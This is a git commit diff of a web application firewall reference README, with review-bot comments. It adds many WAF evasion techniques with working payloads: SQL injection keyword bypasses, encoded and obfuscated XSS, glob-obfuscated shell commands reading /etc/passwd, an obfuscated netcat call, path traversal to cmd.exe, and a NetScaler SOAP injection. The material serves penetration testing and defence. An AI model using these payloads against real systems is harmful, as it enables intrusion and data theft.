mirror of
https://github.com/0xInfection/Awesome-WAF.git
synced 2025-01-03 13:30:03 +07:00
Added more stuff
This commit is contained in:
parent
6eae91aff8
commit
e1d0be8874
332
README.md
@ -10,19 +10,38 @@ __A Concise Definition:__ A web application firewall is a security policy enforc
|
|||||||
Feel free to [contribute](CONTRIBUTING.md).
|
Feel free to [contribute](CONTRIBUTING.md).
|
||||||
|
|
||||||
### Contents:
|
### Contents:
|
||||||
- [Awesome WAFs List](#awesome-waf-list)
|
- [Introduction](#introduction)
|
||||||
- [Awesome Testing Methodology](#testing-methodology)
|
- [How WAFs Work](#how-wafs-work)
|
||||||
- [Awesome WAF Detection](#waf-detection)
|
- [Operation Modes](#operation-modes)
|
||||||
- [Awesome Evasion Techniques](#evasion-techniques)
|
- [Testing Methodology](#testing-methodology)
|
||||||
- [Awesome Tools](#awesome-tools)
|
- [Where To Look](#where-to-look)
|
||||||
- [Awesome Blogs & Writeups](#blogs-and-writeups)
|
- [Detection Techniques](#detection-techniques)
|
||||||
|
- [WAF Fingerprints](#waf-fingerprints)
|
||||||
|
- [Evasion Techniques](#evasion-techniques)
|
||||||
|
- [Fuzzing/Bruteforcing](#fuzzingbruteforcing)
|
||||||
|
- [Regex Reversing](#regex-reversing)
|
||||||
|
- [Obfuscation/Encoding](#obfuscation)
|
||||||
|
- [Browser Bugs](#browser-bugs)
|
||||||
|
- [HTTP Header Spoofing](#request-header-spoofing)
|
||||||
|
- [Google Dorks Approach](#google-dorks-approach)
|
||||||
|
- [Known Bypasses](#known-bypasses)
|
||||||
|
- [Awesome Tooling](#awesome-tools)
|
||||||
|
- [Fingerprinting](#fingerprinting)
|
||||||
|
- [Testing](#testing)
|
||||||
|
- [Evasion](#evasion)
|
||||||
|
- [Blogs & Writeups](#blogs-and-writeups)
|
||||||
|
- [Video Presentations](#video-presentations)
|
||||||
- [Awesome Presentations & Papers](#presentations--research-papers)
|
- [Awesome Presentations & Papers](#presentations--research-papers)
|
||||||
|
- [Research Papers](#research-papers)
|
||||||
|
- [Presentation Slides](#presentations)
|
||||||
|
- [Licensing & Credits](#credits--license)
|
||||||
|
|
||||||
## How WAFs Work:
|
## Introduction:
|
||||||
|
### How WAFs Work:
|
||||||
- Using a set of rules to distinguish between normal requests and malicious requests.
|
- Using a set of rules to distinguish between normal requests and malicious requests.
|
||||||
- Sometimes they use a learning mode to add rules automatically through learning about user behaviour.
|
- Sometimes they use a learning mode to add rules automatically through learning about user behaviour.
|
||||||
|
|
||||||
## Operation Modes:
|
### Operation Modes:
|
||||||
- __Negative Model (Blacklist based)__ - A blacklisting model uses pre-set signatures to block web traffic that is clearly malicious, and signatures designed to prevent attacks which exploit certain website and web application vulnerabilities. Blacklisting model web application firewalls are a great choice for websites and web applications on the public internet, and are highly effective against an major types of DDoS attacks. Eg. Rule for blocking all `<script>*</script>` inputs.
|
- __Negative Model (Blacklist based)__ - A blacklisting model uses pre-set signatures to block web traffic that is clearly malicious, and signatures designed to prevent attacks which exploit certain website and web application vulnerabilities. Blacklisting model web application firewalls are a great choice for websites and web applications on the public internet, and are highly effective against an major types of DDoS attacks. Eg. Rule for blocking all `<script>*</script>` inputs.
|
||||||
- __Positive Model (Whitelist based)__ - A whitelisting model only allows web traffic according to specifically configured criteria. For example, it can be configured to only allow HTTP GET requests from certain IP addresses. This model can be very effective for blocking possible cyber-attacks, but whitelisting will block a lot of legitimate traffic. Whitelisting model firewalls are probably best for web applications on an internal network that are designed to be used by only a limited group of people, such as employees.
|
- __Positive Model (Whitelist based)__ - A whitelisting model only allows web traffic according to specifically configured criteria. For example, it can be configured to only allow HTTP GET requests from certain IP addresses. This model can be very effective for blocking possible cyber-attacks, but whitelisting will block a lot of legitimate traffic. Whitelisting model firewalls are probably best for web applications on an internal network that are designed to be used by only a limited group of people, such as employees.
|
||||||
- __Mixed/Hybrid Model (Inclusive model)__ - A hybrid security model is one that blends both whitelisting and blacklisting. Depending on all sorts of configuration specifics, hybrid firewalls could be the best choice for both web applications on internal networks and web applications on the public internet.
|
- __Mixed/Hybrid Model (Inclusive model)__ - A hybrid security model is one that blends both whitelisting and blacklisting. Depending on all sorts of configuration specifics, hybrid firewalls could be the best choice for both web applications on internal networks and web applications on the public internet.
|
||||||
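Review bot: the Negative Model bullet carried over unchanged in this hunk still reads "highly effective against an major types of DDoS attacks"; fix the typo ("all major types") and note that nothing else in the section supports the claim that a signature blacklist is highly effective against DDoS, so either cite it or tone it down. Also the new Contents entry "Where To Look" points at #where-to-look, but no heading of that name is visible in this diff, so check that the anchor resolves.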
@ -42,14 +61,14 @@ Feel free to [contribute](CONTRIBUTING.md).
|
|||||||
1. Make a normal GET request from a browser, intercept and test response headers (specifically cookies).
|
1. Make a normal GET request from a browser, intercept and test response headers (specifically cookies).
|
||||||
2. Make a request from command line (eg. cURL), and test response content and headers (no user-agent included).
|
2. Make a request from command line (eg. cURL), and test response content and headers (no user-agent included).
|
||||||
3. If there is a login page somewhere, try some common (easily detectable) payloads like `' or 1 = 1 --`.
|
3. If there is a login page somewhere, try some common (easily detectable) payloads like `' or 1 = 1 --`.
|
||||||
4. If there is some search box or input field somewhere, try detecting payloads like `<script>alert()</script>`.
|
4. If there is some input field somewhere, try with noisy payloads like `<script>alert()</script>`.
|
||||||
5. Make GET requests with outdated protocols like `HTTP/0.9` (`HTTP/0.9` does not support POST type queries).
|
5. Make GET requests with outdated protocols like `HTTP/0.9` (`HTTP/0.9` does not support POST type queries).
|
||||||
6. Many a times, the WAF varies the `Server` header upon different types of interactions.
|
6. Many a times, the WAF varies the `Server` header upon different types of interactions.
|
||||||
7. Drop Action Technique - Send a raw crafted FIN/RST packet to server and identify response.
|
7. Drop Action Technique - Send a raw crafted FIN/RST packet to server and identify response.
|
||||||
> __Tip:__ This method could be easily achieved with tools like [HPing3](http://www.hping.org) or [Scapy](https://scapy.net).
|
> __Tip:__ This method could be easily achieved with tools like [HPing3](http://www.hping.org) or [Scapy](https://scapy.net).
|
||||||
8. Side Channel Attacks - Examine the timing behaviour of the request and response content.
|
8. Side Channel Attacks - Examine the timing behaviour of the request and response content.
|
||||||
|
|
||||||
## WAF Detection
|
## WAF Fingerprints
|
||||||
Wanna detect WAFs? Lets see how.
|
Wanna detect WAFs? Lets see how.
|
||||||
> __NOTE__: This section contains manual WAF detection techniques. You might want to switch over to [next section](#awesome-tools).
|
> __NOTE__: This section contains manual WAF detection techniques. You might want to switch over to [next section](#awesome-tools).
|
||||||
|
|
||||||
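Review bot: the NOTE at the end of this hunk still says "You might want to switch over to [next section](#awesome-tools)", but after this commit's Contents reordering the section following WAF Fingerprints is Evasion Techniques and Awesome Tooling sits several sections later; either reword it to "the tooling section" or point the link at the section that actually follows. Minor wording: step 6 "Many a times" should be "Many times", and step 7 should say what in the response identifies the WAF so the step is actionable.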
@ -1426,13 +1445,14 @@ Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists:
|
|||||||
- Wordlists specifically for fuzzing
|
- Wordlists specifically for fuzzing
|
||||||
- [Seclists/Fuzzing](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing).
|
- [Seclists/Fuzzing](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing).
|
||||||
- [Fuzz-DB/Attack](https://github.com/fuzzdb-project/fuzzdb/tree/master/attack)
|
- [Fuzz-DB/Attack](https://github.com/fuzzdb-project/fuzzdb/tree/master/attack)
|
||||||
|
- [Other Payloads](https://github.com/foospidy/payloads)
|
||||||
|
|
||||||
#### Technique:
|
#### Technique:
|
||||||
- Load up your wordlist into fuzzer and start the bruteforce.
|
- Load up your wordlist into fuzzer and start the bruteforce.
|
||||||
- Record/log all responses from the different payloads fuzzed.
|
- Record/log all responses from the different payloads fuzzed.
|
||||||
- Use random user-agents, ranging from Chrome Desktop to iPhone browser.
|
- Use random user-agents, ranging from Chrome Desktop to iPhone browser.
|
||||||
- If blocking noticed, increase fuzz latency (eg. 2-4 secs).
|
- If blocking noticed, increase fuzz latency (eg. 2-4 secs).
|
||||||
- Always use proxies, since chances are real that your IP gets blocked.
|
- Always use proxychains, since chances are real that your IP gets blocked.
|
||||||
|
|
||||||
#### Drawbacks:
|
#### Drawbacks:
|
||||||
- This method often fails.
|
- This method often fails.
|
||||||
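Review bot: the changed bullet "Always use proxychains" swaps a general precaution (use proxies) for one specific tool without linking it the way other tools in this document are linked; keep the technique-level wording and name the tool as an example, e.g. "Always route through proxies (e.g. proxychains), since ...". Also "If blocking noticed" should read "If blocking is noticed", and the Drawbacks bullet "This method often fails" would be more useful if it said why (rate limiting and IP blocking, which the bullets above already anticipate).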
@ -1448,62 +1468,53 @@ Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists:
|
|||||||
|
|
||||||
### Keyword Filter Detection/Bypass
|
### Keyword Filter Detection/Bypass
|
||||||
|
|
||||||
__SQL Injection__
|
__Example__: SQL Injection
|
||||||
|
|
||||||
##### • Step 1:
|
##### • Step 1:
|
||||||
__Keyword filer__: `and`, `or`, `union`
|
__Keywords Filtered__: `and`, `or`, `union`
|
||||||
__Possible PHP Filter Code__: `preg_match('/(and|or|union)/i', $id)`
|
|
||||||
- __Filtered Injection__: `union select user, password from users`
|
- __Filtered Injection__: `union select user, password from users`
|
||||||
- __Bypassed Injection__: `1 || (select user from users where user_id = 1) = 'admin'`
|
- __Bypassed Injection__: `1 || (select user from users where user_id = 1) = 'admin'`
|
||||||
|
|
||||||
##### • Step 2:
|
##### • Step 2:
|
||||||
__Keyword filer__: `and`, `or`, `union`, `where`
|
__Keywords Filtered__: `and`, `or`, `union`, `where`
|
||||||
__Possible PHP Filter Code__: `preg_match('/(and|or|union|where)/i', $id)`
|
|
||||||
- __Filtered Injection__: `1 || (select user from users where user_id = 1) = 'admin'`
|
- __Filtered Injection__: `1 || (select user from users where user_id = 1) = 'admin'`
|
||||||
- __Bypassed Injection__: `1 || (select user from users limit 1) = 'admin'`
|
- __Bypassed Injection__: `1 || (select user from users limit 1) = 'admin'`
|
||||||
|
|
||||||
##### • Step 3:
|
##### • Step 3:
|
||||||
__Keyword filer__: `and`, `or`, `union`, `where`, `limit`
|
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`
|
||||||
__Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit)/i', $id)`
|
|
||||||
- __Filtered Injection__: `1 || (select user from users limit 1) = 'admin'`
|
- __Filtered Injection__: `1 || (select user from users limit 1) = 'admin'`
|
||||||
- __Bypassed Injection__: `1 || (select user from users group by user_id having user_id = 1) = 'admin'`
|
- __Bypassed Injection__: `1 || (select user from users group by user_id having user_id = 1) = 'admin'`
|
||||||
|
|
||||||
##### • Step 4:
|
##### • Step 4:
|
||||||
__Keyword filer__: `and`, `or`, `union`, `where`, `limit`, `group by`
|
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`
|
||||||
__Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit|group by)/i', $id)`
|
|
||||||
- __Filtered Injection__: `1 || (select user from users group by user_id having user_id = 1) = 'admin'`
|
- __Filtered Injection__: `1 || (select user from users group by user_id having user_id = 1) = 'admin'`
|
||||||
- __Bypassed Injection__: `1 || (select substr(group_concat(user_id),1,1) user from users ) = 1`
|
- __Bypassed Injection__: `1 || (select substr(group_concat(user_id),1,1) user from users ) = 1`
|
||||||
|
|
||||||
##### • Step 5:
|
##### • Step 5:
|
||||||
__Keyword filer__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`
|
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`
|
||||||
__Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit|group by|select)/i', $id)`
|
|
||||||
- __Filtered Injection__: `1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1`
|
- __Filtered Injection__: `1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1`
|
||||||
- __Bypassed Injection__: `1 || 1 = 1 into outfile 'result.txt'`
|
- __Bypassed Injection__: `1 || 1 = 1 into outfile 'result.txt'`
|
||||||
- __Bypassed Injection__: `1 || substr(user,1,1) = 'a'`
|
- __Bypassed Injection__: `1 || substr(user,1,1) = 'a'`
|
||||||
|
|
||||||
##### • Step 6:
|
##### • Step 6:
|
||||||
__Keyword filer__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`
|
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`
|
||||||
__Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit|group by|select|\')/i', $id)`
|
|
||||||
- __Filtered Injection__: `1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1`
|
- __Filtered Injection__: `1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1`
|
||||||
- __Bypassed Injection__: `1 || user_id is not null`
|
- __Bypassed Injection__: `1 || user_id is not null`
|
||||||
- __Bypassed Injection__: `1 || substr(user,1,1) = 0x61`
|
- __Bypassed Injection__: `1 || substr(user,1,1) = 0x61`
|
||||||
- __Bypassed Injection__: `1 || substr(user,1,1) = unhex(61)`
|
- __Bypassed Injection__: `1 || substr(user,1,1) = unhex(61)`
|
||||||
|
|
||||||
##### • Step 7:
|
##### • Step 7:
|
||||||
__Keyword filer__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`, `hex`
|
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`, `hex`
|
||||||
__Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit|group by|select|\'|hex)/i', $id)`
|
|
||||||
- __Filtered Injection__: `1 || substr(user,1,1) = unhex(61)`
|
- __Filtered Injection__: `1 || substr(user,1,1) = unhex(61)`
|
||||||
- __Bypassed Injection__: `1 || substr(user,1,1) = lower(conv(11,10,36))`
|
- __Bypassed Injection__: `1 || substr(user,1,1) = lower(conv(11,10,36))`
|
||||||
|
|
||||||
##### • Step 8:
|
##### • Step 8:
|
||||||
__Keyword filer__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`, `hex`, `substr`
|
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`, `hex`, `substr`
|
||||||
__Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr)/i', $id)`
|
|
||||||
- __Filtered Injection__: `1 || substr(user,1,1) = lower(conv(11,10,36))`
|
- __Filtered Injection__: `1 || substr(user,1,1) = lower(conv(11,10,36))`
|
||||||
- __Bypassed Injection__: `1 || lpad(user,7,1)`
|
- __Bypassed Injection__: `1 || lpad(user,7,1)`
|
||||||
|
|
||||||
##### • Step 9:
|
##### • Step 9:
|
||||||
__Keyword filer__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`, `hex`, `substr`, `white space`
|
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`, `hex`, `substr`, `white space`
|
||||||
__Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $id)`
|
|
||||||
- __Filtered Injection__: `1 || lpad(user,7,1)`
|
- __Filtered Injection__: `1 || lpad(user,7,1)`
|
||||||
- __Bypassed Injection__: `1%0b||%0blpad(user,7,1)`
|
- __Bypassed Injection__: `1%0b||%0blpad(user,7,1)`
|
||||||
|
|
||||||
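Review bot: the added "Possible PHP Filter Code" lines are unanchored substring regexes, so they reject far more than the listed keywords: `/(and|or|union)/i` matches any input containing "or", including the column name `password` in the Step 1 filtered injection, and the `\s` alternative in Step 9 rejects any input containing whitespace at all; if these are meant to illustrate an over-broad keyword filter, say so, since a reader may copy them as a sample ruleset. Whether `\s` matches the vertical tab (`%0b`) used in the Step 9 bypass also depends on the PCRE version, so that step is version-dependent. The typo `gruop_concat` in the Step 5 and Step 6 Filtered Injection lines (inherited unchanged) should be `group_concat`; as written the "filtered" string does not match the "bypassed" string from Step 4.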
@ -1513,91 +1524,125 @@ __Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit|group b
|
|||||||
- You can encode whole payload, or some parts of it and test recursively.
|
- You can encode whole payload, or some parts of it and test recursively.
|
||||||
|
|
||||||
#### Techniques:
|
#### Techniques:
|
||||||
__1. URL Encoding__
|
__1. Case Toggling__
|
||||||
|
- Some poorly developed WAFs filter selectively specific case WAFs.
|
||||||
|
- We can combine upper and lower case characters for developing efficient payloads.
|
||||||
|
|
||||||
|
__Standard__: `<script>alert()</script>`
|
||||||
|
__Bypassed__: `<ScRipT>alert()</sCRipT>`
|
||||||
|
|
||||||
|
__Standard__: `SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'`
|
||||||
|
__Bypassed__: `sELecT * FrOM all_tables whERe OwNeR = 'DATABASE_NAME'`
|
||||||
|
|
||||||
|
__2. URL Encoding__
|
||||||
- Encode normal payloads with % encoding/URL encoding.
|
- Encode normal payloads with % encoding/URL encoding.
|
||||||
- Can be done with online tools like [this](https://www.url-encode-decode.com/).
|
- Can be done with online tools like [this](https://www.url-encode-decode.com/).
|
||||||
- Burp includes a in-built encoder/decoder.
|
- Burp includes a in-built encoder/decoder.
|
||||||
|
|
||||||
Blocked: `<svG/x=">"/oNloaD=confirm()//`
|
__Blocked__: `<svG/x=">"/oNloaD=confirm()//`
|
||||||
Bypassed: `%3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F`
|
__Bypassed__: `%3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F`
|
||||||
|
|
||||||
Blocked: `.0union(select 1,2,3,4,5,6,7,8,9,10,11,12)`
|
__Blocked__: `uNIoN(sEleCT 1,2,3,4,5,6,7,8,9,10,11,12)`
|
||||||
Bypassed: `%2e%30%75%4e%49%4f%6e%28%73%65%6c%65%63%74%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%29`
|
__Bypassed__: `uNIoN%28sEleCT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%29`
|
||||||
|
|
||||||
__2. Unicode Encoding__
|
__3. Unicode Encoding__
|
||||||
- Most modern web-apps support UTF-8.
|
- Most modern web-apps support UTF-8 and hence are prone to this method.
|
||||||
- ASCII characters in unicode encoding encoding provide great variants for bypassing.
|
- ASCII characters in unicode encoding encoding provide great variants for bypassing.
|
||||||
|
- You can encode entire/part of the payload for obtaining results.
|
||||||
|
|
||||||
Standard: `prompt()`
|
__Standard__: `prompt()`
|
||||||
Obfuscated: `pro\u006dpt()`
|
__Obfuscated__: `pro\u006dpt()`
|
||||||
|
|
||||||
Standard: `../../appusers.txt`
|
__Standard__: `../../appusers.txt`
|
||||||
Obfuscated: `%C0AE%C0AE%C0AF%C0AE%C0AE%C0AFappusers.txt`
|
__Obfuscated__: `%C0AE%C0AE%C0AF%C0AE%C0AE%C0AFappusers.txt`
|
||||||
|
|
||||||
__BONUS:__
|
__4. HTML Encoding__
|
||||||
If the application allows alternate charset interpretation, i.e. if the web app interprets `а` or `ā` as `a`,. the attack vectors get more diverse.
|
|
||||||
|
|
||||||
Standard: prompt()
|
|
||||||
Variant: рrомрt()
|
|
||||||
|
|
||||||
__3. HTML Encoding__
|
|
||||||
- Often web apps encode special characters into HTML encoding and render accordingly.
|
- Often web apps encode special characters into HTML encoding and render accordingly.
|
||||||
- This leads us to basic bypass cases with HTML encoding (numeric/generic).
|
- This leads us to basic bypass cases with HTML encoding (numeric/generic).
|
||||||
|
|
||||||
Standard: `"><img src=x onerror=confirm()>`
|
__Standard__: `"><img src=x onerror=confirm()>`
|
||||||
Encoded: `"><img src=x onerror=confirm()>` (General form)
|
__Encoded__: `"><img src=x onerror=confirm()>` (General form)
|
||||||
Encoded: `"><img src=x onerror=confirm()>` (Numeric reference)
|
__Encoded__: `"><img src=x onerror=confirm()>` (Numeric reference)
|
||||||
|
|
||||||
__4. Mixed Encoding__
|
__5. Mixed Encoding__
|
||||||
- WAF rules often tend to filter out a single type of encoding.
|
- WAF rules often tend to filter out a single type of encoding.
|
||||||
- This type of filters can be bypassed by mixed encoding payloads.
|
- This type of filters can be bypassed by mixed encoding payloads.
|
||||||
|
- Tabs and newlines further add to obfuscation.
|
||||||
|
|
||||||
Standard: `<script/src=data;text/javascript, alert()></script>`
|
__Obfuscated__:
|
||||||
Obfuscated: `<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74()></script>`
|
```
|
||||||
|
<A HREF="h
|
||||||
|
tt p://6 6.000146.0x7.147/">XSS</A>
|
||||||
|
```
|
||||||
|
|
||||||
__5. Using Comments__
|
__6. Using Comments__
|
||||||
- Comments obfuscate standard payload vectors.
|
- Comments obfuscate standard payload vectors.
|
||||||
- Different payloads have different ways of obfuscation.
|
- Different payloads have different ways of obfuscation.
|
||||||
|
|
||||||
Blocked: `<script>alert()</script>`
|
__Blocked__: `<script>alert()</script>`
|
||||||
Bypassed: `<!--><script>alert/**/()/**/</script>`
|
__Bypassed__: `<!--><script>alert/**/()/**/</script>`
|
||||||
|
|
||||||
Blocked: `/?id=1+union+select+1,2,3---`
|
__Blocked__: `/?id=1+union+select+1,2,3---`
|
||||||
Bypassed: `/?id=1+un/**/ion+sel/**/ect+1,2,3-`
|
__Bypassed__: `/?id=1+un/**/ion+sel/**/ect+1,2,3-`
|
||||||
|
|
||||||
__6. Double Encoding__
|
__7. Double Encoding__
|
||||||
- Often WAF filters tend to encode characters to prevent attacks.
|
- Often WAF filters tend to encode characters to prevent attacks.
|
||||||
- However poorly developed filters (no recursion filters) can be bypassed with double encoding.
|
- However poorly developed filters (no recursion filters) can be bypassed with double encoding.
|
||||||
|
|
||||||
Standard: `http://victim/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\`
|
__Standard__: `http://victim/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\`
|
||||||
Obfuscated: `http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\`
|
__Obfuscated__: `http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\`
|
||||||
|
|
||||||
Standard: `<script>alert('XSS')</script>`
|
__Standard__: `<script>alert('XSS')</script>`
|
||||||
Obfuscated: `%253Cscript%253Ealert('XSS')%253C%252Fscript%253E`
|
__Obfuscated__: `%253Cscript%253Ealert('XSS')%253C%252Fscript%253E`
|
||||||
|
|
||||||
__7. Wildcard Encoding__
|
__8. Wildcard Encoding__
|
||||||
- Globbing patterns are used by various command-line utilities to work with multiple files.
|
- Globbing patterns are used by various command-line utilities to work with multiple files.
|
||||||
- We can tweak them to execute system commands.
|
- We can tweak them to execute system commands.
|
||||||
- Specific to remote code execution vulnerabilities on linux systems.
|
- Specific to remote code execution vulnerabilities on linux systems.
|
||||||
|
|
||||||
Standard: `/bin/cat /etc/passwd`
|
__Standard__: `/bin/cat /etc/passwd`
|
||||||
Obfuscated: `/???/??t /???/??ss??`
|
__Obfuscated__: `/???/??t /???/??ss??`
|
||||||
Used chars: `/ ? t s`
|
Used chars: `/ ? t s`
|
||||||
|
|
||||||
Standard: `/bin/nc 127.0.0.1 1337`
|
__Standard__: `/bin/nc 127.0.0.1 1337`
|
||||||
Obfuscated: `/???/n? 2130706433 1337`
|
__Obfuscated__: `/???/n? 2130706433 1337`
|
||||||
Used chars: `/ ? n [0-9]`
|
Used chars: `/ ? n [0-9]`
|
||||||
|
|
||||||
__8. String Concatenation__
|
__9. String Concatenation__
|
||||||
- Different programming languages have different syntaxes and patterns for concatenation.
|
- Different programming languages have different syntaxes and patterns for concatenation.
|
||||||
- This allows us to effectively generate payloads that can bypass many filters and rules.
|
- This allows us to effectively generate payloads that can bypass many filters and rules.
|
||||||
|
|
||||||
Standard: `/bin/cat /etc/passwd`
|
__Standard__: `/bin/cat /etc/passwd`
|
||||||
Obfuscated: `/bi'n/c'at' /e'tc'/pa'''ss'wd`
|
__Obfuscated__: `/bi'n/c'at' /e'tc'/pa'''ss'wd`
|
||||||
> Bash allows path concatenation for execution.
|
> Bash allows path concatenation for execution.
|
||||||
|
|
||||||
Standard: `<iframe/onload='this["src"]="javascript:alert()"';>`
|
__Standard__: `<iframe/onload='this["src"]="javascript:alert()"';>`
|
||||||
Obfuscated: `<iframe/onload='this["src"]="jav"+"as	cr"+"ipt:al"+"er"+"t()"';>`
|
__Obfuscated__: `<iframe/onload='this["src"]="jav"+"as	cr"+"ipt:al"+"er"+"t()"';>`
|
||||||
|
|
||||||
|
__9. Junk Chars__
|
||||||
|
- Normal payloads get filtered out easily.
|
||||||
|
- Adding some junk chars avoid detection (specific cases only).
|
||||||
|
|
||||||
|
__Standard__: `<script>alert()</script>`
|
||||||
|
__Obfuscated__: `<script>+-+-1-+-+alert(1)</script>`
|
||||||
|
|
||||||
|
__Standard__: `<a href=javascript;alert()>ClickMe `
|
||||||
|
__Bypassed__: `<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe`
|
||||||
|
|
||||||
|
__10. Line Breaks__
|
||||||
|
- Many WAF with regex based filtering effectively blocks many attempts.
|
||||||
|
- Line breaks (CR/LF) can break firewall regex and bypass stuff.
|
||||||
|
|
||||||
|
__Standard__: `<iframe src=javascript:alert(0)">`
|
||||||
|
__Obfuscated__: `<iframe src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)">`
|
||||||
|
|
||||||
|
__11. Uninitialized Variables__
|
||||||
|
- Uninitialized bash variables can elude regular expression based filters and pattern match.
|
||||||
|
- Uninitialised variables have value null/they act like empty strings.
|
||||||
|
- Both bash and perl allow this kind of interpretations.
|
||||||
|
|
||||||
|
__Standard__: `cat /etc/passwd`
|
||||||
|
__Obfuscated__: `cat$u $u/etc$u/passwd$u`
|
||||||
|
|
||||||
### Browser Bugs:
|
### Browser Bugs:
|
||||||
#### Charset Bugs:
|
#### Charset Bugs:
|
||||||
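Review bot: this hunk drops the BONUS block on alternate charset interpretation (`рrомрt()` as a homoglyph of `prompt()`) while renumbering the other techniques, with nothing replacing it; if the removal is intended, say so in the commit message, otherwise restore it as its own numbered technique. The Mixed Encoding section loses its Standard line, so the new fenced `<A HREF="h tt p://6 6.000146.0x7.147/">XSS</A>` example no longer shows which plain payload it obfuscates. The Case Toggling bullet "Some poorly developed WAFs filter selectively specific case WAFs" is garbled; "Some poorly developed WAFs only filter a specific letter case" reads as intended. Lastly, the Line Breaks Standard payload `<iframe src=javascript:alert(0)">` has an unbalanced quote.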
@ -1606,12 +1651,12 @@ Obfuscated: `<iframe/onload='this["src"]="jav"+"as	cr"+"ipt:al"+"er"+"t()"';
|
|||||||
|
|
||||||
Example request:
|
Example request:
|
||||||
<pre>
|
<pre>
|
||||||
GET <b>/page.php?p=%00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E</b> HTTP/1.1
|
GET <b>/page.php?p=%00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E</b> HTTP/1.1
|
||||||
Host: site.com
|
Host: site.com
|
||||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
|
||||||
<b>Accept-Charset:utf-32; q=0.5</b>
|
<b>Accept-Charset:utf-32; q=0.5</b>
|
||||||
Accept-Language: en-US,en;q=0.5
|
Accept-Language: en-US,en;q=0.5
|
||||||
Accept-Encoding: gzip, deflate
|
Accept-Encoding: gzip, deflate
|
||||||
</pre>
|
</pre>
|
||||||
When the site loads, it will be encoded to the UTF-32 encoding that we set, and
|
When the site loads, it will be encoded to the UTF-32 encoding that we set, and
|
||||||
then as the output encoding of the page is utf-8, it will be rendered as: `"<script>alert (1) </ script>`.
|
then as the output encoding of the page is utf-8, it will be rendered as: `"<script>alert (1) </ script>`.
|
||||||
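Review bot: the charset-bug example is internally inconsistent: the request in the `<pre>` block carries a UTF-32-padded `<svg/onload=alert()>` payload, but the explanation that follows says it renders as `"<script>alert (1) </ script>`; align the two so the reader can follow the encoding through. Also `Accept-Charset:utf-32` is missing the space after the colon that the other headers have.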
@ -1703,13 +1748,35 @@ Before anything else, you should hone up skills from [Google Dorks Cheat Sheet](
|
|||||||
`site:pastebin.com +<wafname> bypass`
|
`site:pastebin.com +<wafname> bypass`
|
||||||
|
|
||||||
## Known Bypasses:
|
## Known Bypasses:
|
||||||
### __Cloudflare__
|
### Citrix NetScaler
|
||||||
|
- HTTP Parameter Pollution (NS10.5) [@BGA Security](https://www.exploit-db.com/?author=7396)
|
||||||
|
```
|
||||||
|
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
|
||||||
|
<soapenv:Header/>
|
||||||
|
<soapenv:Body>
|
||||||
|
<string>’ union select current_user, 2#</string>
|
||||||
|
</soapenv:Body>
|
||||||
|
</soapenv:Envelope>
|
||||||
|
```
|
||||||
|
|
||||||
|
- `generic_api_call.pl` XSS by [@NNPoster](https://www.exploit-db.com/?author=6654)
|
||||||
|
```
|
||||||
|
